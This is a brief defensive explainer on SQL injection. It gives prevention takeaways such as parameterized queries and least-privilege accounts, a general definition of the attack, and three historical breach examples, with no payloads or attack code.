- Never concatenate user input directly into SQL query strings.
- Parameterized queries and prepared statements are the primary defense.
- Input validation alone is not sufficient to prevent SQL injection.
- Least-privilege database accounts limit damage if injection succeeds.
- Monitor for unusual query patterns, errors, and bulk data access.
What is it and why it matters
SQL injection occurs when an application passes untrusted user input into a SQL query without proper sanitization, allowing an attacker to alter the query’s logic. By injecting SQL fragments through form fields, URL parameters, or HTTP headers, attackers can read sensitive data, modify database records, execute administrative operations, and in some cases issue commands to the underlying operating system. It consistently ranks among the OWASP Top 10 and remains a leading cause of data breaches because a single vulnerable parameter can expose entire databases.
Real world examples
- Heartland Payment Systems breach (2008) — Albert Gonzalez used SQL injection to steal over 130 million credit card numbers in one of the largest payment card breaches ever recorded.
- TalkTalk breach (2015) — A SQL injection vulnerability in a legacy web portal exposed personal data of over 150,000 UK customers and led to a £400,000 ICO fine.
- Sony Pictures breach (2011) — SQL injection was used to compromise Sony Pictures, leaking passwords and personal data for over one million accounts.